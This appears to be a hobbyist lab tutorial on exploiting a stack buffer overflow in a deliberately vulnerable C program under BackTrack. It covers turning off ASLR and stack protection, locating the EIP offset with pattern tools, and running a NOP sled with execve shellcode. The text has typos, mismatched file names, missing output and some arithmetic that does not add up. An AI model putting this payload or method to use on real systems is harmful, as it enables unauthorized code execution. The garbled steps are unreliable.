EXPLOITASI BACTRACK R2 ( Stack overflow )

1. Turn Off  " ASLR Linux "

root@justview:~# cat /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@justview:~# echo 0 > /proc/sys/kernel/randomize_va_space

2. Create Vulnareable application :

Open Your Editor write this Vulnareable application


##############################
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function!
return 0;
}
##############################

After that please save with name vulnareable.c

3. Compile the application

show result

4. Run application

Ok Let's Run command to Overwrite this applciation with characters 41

(gdb) run $(python -c 'print "\x41" * 600')

After we RUN we can't see Overwrite of EIP, because gcc 3.x and 4.x by default compile code using a protection technique called “stack-smashing. this protection available on default of all system operation linux.
It is therefore we must turn off SSP.

5. Turnn off SSP

Open NEW TAB

root@justview:~# gcc -ggdb -o vulnareble -fno-stack-protector -mpreferred-stack-boundary=2 vulnareble.c

 6. RUN again the application

root@justview:~# gdb vulnareble

send again your fuzzer

(gdb) run $(python -c 'print "\x41"*600')

we can see that we success to overwrite eip with our character 414141. Next we create dummies with ./pattern create to create string characters as many as 600.

7. Create pattern

root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 600 > string_pattern.txt

Open the file using kwrite :

after that copy the characters into your fuzzer

8. Using the 600 characters to know address of registers EIP

we get information about on how many bytes to EIP crushed    ( 0x41387141 )

9. Using pattern_offset to know bytes

we know at 504 bytes the EIP was crushed. so we on 4 bytes so in the next 4 bytes will enter the address esp coz. 508

10. change back our fuzzer

(gdb) run $(python -c 'print "\x41"*508')

ow we success to control EIP and ESP.

11. Let's search address of ESP

On this case we will make 323 bytes of junk + a shellcode which is 45 bytes = 368 bytes.
508 bytes - 368 bytes = 140 bytes.
So after the shellcode we still have 140 bytes, we divide 140 with 4 (to fit an entire memory address:
\x41\x41\x41\x41 for example.) and get 35.

we get address of registers ESP 0xbffff16c

Now open your Kclac (calculator)
0xbffff16c - 200

12. Generate Shellcode
Download here generate shell

After we get shellcode

change your fuzzer


run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')
Starting program: /root/vulner $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x6c\xef\xff\xbf" * 35')

after you run then result

if you found this condition.. you must Quit and run again your fuzzer.

then  try change value of fuzzer 370 and get result..

after try change again velue of fuzzer 301 finally i success..

GOOD LUCK
Try Harder..